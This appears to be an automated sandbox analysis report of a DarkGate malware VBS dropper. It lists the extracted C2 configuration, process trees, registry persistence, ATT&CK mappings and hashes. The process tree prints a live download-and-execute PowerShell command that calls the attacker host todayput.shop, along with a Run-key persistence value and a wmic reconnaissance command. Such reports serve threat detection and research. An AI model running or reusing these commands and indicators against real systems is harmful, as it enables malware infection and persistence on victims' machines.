Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2024 10:32
Static task
static1
Behavioral task
behavioral1
Sample
filter0912.2.vbs
Resource
win7-20240729-en
General
-
Target
filter0912.2.vbs
-
Size
250B
-
MD5
0f5e506c6622ef23867764b600e2c4b4
-
SHA1
e6b079ecc9537672cc3b8390b0509770045b9bbd
-
SHA256
793b4e318eba9ef99173836a92ef2959a9ff73026647c0714ab7280f0dbe3fac
-
SHA512
48fca5308d3a37a7ab974c299c689ce8122b355eb44fe8bc033c80481f73fe74c13586b122d8e86fcd4d26d24153e5a034a8e7262801e3716a2010cbbc8f0b85
Malware Config
Extracted
darkgate
drk3
todayput.shop
-
anti_analysis
false
-
anti_debug
false
-
anti_vm
false
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
sEhfQzVh
-
minimum_disk
100
-
minimum_ram
4096
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
drk3
Signatures
-
Darkgate family
-
Detect DarkGate stealer 7 IoCs
resource yara_rule behavioral2/memory/624-43-0x00000000026E0000-0x0000000002E82000-memory.dmp family_darkgate_v6 behavioral2/memory/624-50-0x00000000026E0000-0x0000000002E82000-memory.dmp family_darkgate_v6 behavioral2/memory/624-51-0x00000000026E0000-0x0000000002E82000-memory.dmp family_darkgate_v6 behavioral2/memory/624-49-0x00000000026E0000-0x0000000002E82000-memory.dmp family_darkgate_v6 behavioral2/memory/624-53-0x00000000026E0000-0x0000000002E82000-memory.dmp family_darkgate_v6 behavioral2/memory/624-52-0x00000000026E0000-0x0000000002E82000-memory.dmp family_darkgate_v6 behavioral2/memory/4820-54-0x0000000002600000-0x0000000002DA2000-memory.dmp family_darkgate_v6 -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description pid Process procid_target PID 2272 created 3940 2272 Autoit3.exe 59 PID 2272 created 2748 2272 Autoit3.exe 47 PID 624 created 4044 624 GoogleUpdateCore.exe 60 -
Blocklisted process makes network request 2 IoCs
flow pid Process 7 3196 powershell.exe 8 3196 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 2272 Autoit3.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dbegdck = "\"C:\\ProgramData\\hcbchdd\\Autoit3.exe\" C:\\ProgramData\\hcbchdd\\eehhkhe.a3x" GoogleUpdateCore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dbegdck = "\"C:\\ProgramData\\hcbchdd\\Autoit3.exe\" C:\\ProgramData\\hcbchdd\\eehhkhe.a3x" GoogleUpdateCore.exe -
Command and Scripting Interpreter: AutoIT 1 TTPs 1 IoCs
Using AutoIT for possible automate script.
pid Process 2272 Autoit3.exe -
pid Process 3196 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GoogleUpdateCore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GoogleUpdateCore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Autoit3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Autoit3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Autoit3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GoogleUpdateCore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GoogleUpdateCore.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 GoogleUpdateCore.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GoogleUpdateCore.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 3196 powershell.exe 3196 powershell.exe 2272 Autoit3.exe 2272 Autoit3.exe 2272 Autoit3.exe 2272 Autoit3.exe 2272 Autoit3.exe 2272 Autoit3.exe 624 GoogleUpdateCore.exe 624 GoogleUpdateCore.exe 624 GoogleUpdateCore.exe 624 GoogleUpdateCore.exe 4820 GoogleUpdateCore.exe 4820 GoogleUpdateCore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 624 GoogleUpdateCore.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeDebugPrivilege 3196 powershell.exe Token: SeIncreaseQuotaPrivilege 4552 WMIC.exe Token: SeSecurityPrivilege 4552 WMIC.exe Token: SeTakeOwnershipPrivilege 4552 WMIC.exe Token: SeLoadDriverPrivilege 4552 WMIC.exe Token: SeSystemProfilePrivilege 4552 WMIC.exe Token: SeSystemtimePrivilege 4552 WMIC.exe Token: SeProfSingleProcessPrivilege 4552 WMIC.exe Token: SeIncBasePriorityPrivilege 4552 WMIC.exe Token: SeCreatePagefilePrivilege 4552 WMIC.exe Token: SeBackupPrivilege 4552 WMIC.exe Token: SeRestorePrivilege 4552 WMIC.exe Token: SeShutdownPrivilege 4552 WMIC.exe Token: SeDebugPrivilege 4552 WMIC.exe Token: SeSystemEnvironmentPrivilege 4552 WMIC.exe Token: SeRemoteShutdownPrivilege 4552 WMIC.exe Token: SeUndockPrivilege 4552 WMIC.exe Token: SeManageVolumePrivilege 4552 WMIC.exe Token: 33 4552 WMIC.exe Token: 34 4552 WMIC.exe Token: 35 4552 WMIC.exe Token: 36 4552 WMIC.exe Token: SeIncreaseQuotaPrivilege 4552 WMIC.exe Token: SeSecurityPrivilege 4552 WMIC.exe Token: SeTakeOwnershipPrivilege 4552 WMIC.exe Token: SeLoadDriverPrivilege 4552 WMIC.exe Token: SeSystemProfilePrivilege 4552 WMIC.exe Token: SeSystemtimePrivilege 4552 WMIC.exe Token: SeProfSingleProcessPrivilege 4552 WMIC.exe Token: SeIncBasePriorityPrivilege 4552 WMIC.exe Token: SeCreatePagefilePrivilege 4552 WMIC.exe Token: SeBackupPrivilege 4552 WMIC.exe Token: SeRestorePrivilege 4552 WMIC.exe Token: SeShutdownPrivilege 4552 WMIC.exe Token: SeDebugPrivilege 4552 WMIC.exe Token: SeSystemEnvironmentPrivilege 4552 WMIC.exe Token: SeRemoteShutdownPrivilege 4552 WMIC.exe Token: SeUndockPrivilege 4552 WMIC.exe Token: SeManageVolumePrivilege 4552 WMIC.exe Token: 33 4552 WMIC.exe Token: 34 4552 WMIC.exe Token: 35 4552 WMIC.exe Token: 36 4552 WMIC.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 4712 wrote to memory of 3196 4712 WScript.exe 83 PID 4712 wrote to memory of 3196 4712 WScript.exe 83 PID 4712 wrote to memory of 2272 4712 WScript.exe 85 PID 4712 wrote to memory of 2272 4712 WScript.exe 85 PID 4712 wrote to memory of 2272 4712 WScript.exe 85 PID 2272 wrote to memory of 908 2272 Autoit3.exe 86 PID 2272 wrote to memory of 908 2272 Autoit3.exe 86 PID 2272 wrote to memory of 908 2272 Autoit3.exe 86 PID 908 wrote to memory of 4552 908 cmd.exe 88 PID 908 wrote to memory of 4552 908 cmd.exe 88 PID 908 wrote to memory of 4552 908 cmd.exe 88 PID 2272 wrote to memory of 624 2272 Autoit3.exe 93 PID 2272 wrote to memory of 624 2272 Autoit3.exe 93 PID 2272 wrote to memory of 624 2272 Autoit3.exe 93 PID 2272 wrote to memory of 624 2272 Autoit3.exe 93 PID 624 wrote to memory of 4820 624 GoogleUpdateCore.exe 94 PID 624 wrote to memory of 4820 624 GoogleUpdateCore.exe 94 PID 624 wrote to memory of 4820 624 GoogleUpdateCore.exe 94 PID 624 wrote to memory of 4820 624 GoogleUpdateCore.exe 94
Processes
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2748
-
C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe"C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:624
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵PID:3940
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4044
-
C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe"C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe"2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4820
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\filter0912.2.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri http://todayput.shop:8080/wntpswdm)2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\bhqs\yyii\Autoit3.exe"C:\bhqs\yyii\Autoit3.exe" C:\bhqs\yyii\script.a3x2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Command and Scripting Interpreter: AutoIT
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2272 -
\??\c:\windows\SysWOW64\cmd.exe"c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\hcbchdd\beecfkf3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ComputerSystem get domain4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2AutoHotKey & AutoIT
1PowerShell
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54B
MD5c8bbad190eaaa9755c8dfb1573984d81
SHA117ad91294403223fde66f687450545a2bad72af5
SHA2567f136265128b7175fb67024a6ddd7524586b025725a878c07d76a9d8ad3dc2ac
SHA51205f02cf90969b7b9a2de39eecdf810a1835325e7c83ffe81388c9866c6f79be6cdc8617f606a8fedc6affe6127bede4b143106a90289bbb9bf61d94c648059df
-
Filesize
1KB
MD5319ff25b70e29a3310dde4e4d241f82b
SHA1795cde9b62b8c0e25a2a2d4b5821ac06787b1632
SHA25627b38046d4b6a02d22c16cdbde725b631b29b6bad2af7e0454d436abaa80c79a
SHA51295ea94b96c6e5b7147e934f6633ee23acd9d6d45da7e781b8dce96bdf448feea8bd5bd5482d12ef2d422113d4d2e1b8f25eb922f59f6b4216e7a14c7d421a043
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
32B
MD5a011babbccef95bd193744a0f5122550
SHA1cfedfdb25d276b551a0cf5a8c6b6a45a7b695962
SHA256d2934e6da2e5791a957fa7068db1057b42b40f56074912b66a9917b746dd07c2
SHA5125b1200823845167f4ccdcf8a92848cd9e76a14ba383df23264a8cd5e171b77d2fd3f8f26631f94c514829761be2200bf4bdc67c11ba39faa7075640f4d9d5be8
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
581KB
MD52bf27a4ef77513aa86659950f589a089
SHA1e5238f7403f90cc1998f312504707c86585f9da5
SHA256fce2d534623887f17922412cd8b9e4313a695db76573d69dda0f2693b3a0353f
SHA5123c599dc4b5b88966f4657130324d122191500e1ecf4ac912a7c7d31c3d35b2fab9e951831484b63e4d0cfcaabfc7a305e4b91c448533fc1f2e2d4f6ad30fdb9d
-
Filesize
4B
MD53dd7326471f0ce39b622289fc316b50a
SHA1e6d00cd0e630c9c894ed7b723706f7f65213e898
SHA256cec38cb7894fdd48d59b3e2c0b56635d7c58aafb11e12c6201c8dca67e386320
SHA51267f73896221028ca04867ec99e03f86f85cc410a6d2fa5dca66a5211923797e6bdba25caf0289f4e345597410f78fd489405072fab2e778c83477da885da672a
-
Filesize
4B
MD524a941443055434988585baf9070ad0b
SHA14e712ed1b882ec06d4141d9a6678a65a8acdcdac
SHA2565865015c6c841756179d356bed2d00c8a57c589e7798e71e939e84556f9c645f
SHA512c0d18bf171c83c4b2398ab3bb7f02fc29e6af21a1cb3cd56af42acb3239e61e9ae7500e9b1d92c21ba5562e83666ee78da2256f1d38189d7c79950000b7c73c6
-
Filesize
4B
MD5537151830d88d35fac209d60183b2326
SHA1c0014036cdfe32daba364e91c74438a00e93b0fb
SHA25681092cb0748a0c10bf5490b14879c8d06a5f1fa486fdc43494cb0013c26d3ebf
SHA51255323f9f60ecfa875386d53d9f86b404dcf02e035fcdeb2fac26aaf71f24c6607d35881836a9519a28aced76ce2b2f728b9fa1bcf2239735f8746848d739e1aa